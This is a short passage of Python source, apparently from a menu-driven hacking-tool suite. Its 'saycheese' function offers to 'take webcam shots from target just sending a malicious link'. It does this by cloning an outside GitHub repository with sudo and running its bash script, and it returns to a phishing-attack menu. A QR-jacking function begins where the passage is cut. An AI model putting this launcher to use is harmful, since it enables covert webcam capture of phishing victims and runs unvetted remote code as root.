(self)
| 919 | self.phishattack() |
| 920 | |
| 921 | def saycheese(self): |
| 922 | self.clear_scr() |
| 923 | os.system("echo \"Take webcam shots from target just sending a malicious link\"|boxes -d boy | lolcat") |
| 924 | choice = input("[1]Install [2]Run [99]Back >> ") |
| 925 | |
| 926 | self.check_input(choice, self.saycheese, ['1', '2', '99']) |
| 927 | |
| 928 | if choice == "1": |
| 929 | os.system("sudo git clone https://github.com/hangetzzu/saycheese") |
| 930 | self.saycheese() |
| 931 | |
| 932 | if choice == "2": |
| 933 | os.system("cd saycheese && sudo bash saycheese.sh") |
| 934 | self.saycheese() |
| 935 | |
| 936 | if choice == "99": |
| 937 | self.phishattack() |
| 938 | |
| 939 | def qrjacking(self): |
| 940 | self.clear_scr() |
nothing calls this directly
no test coverage detected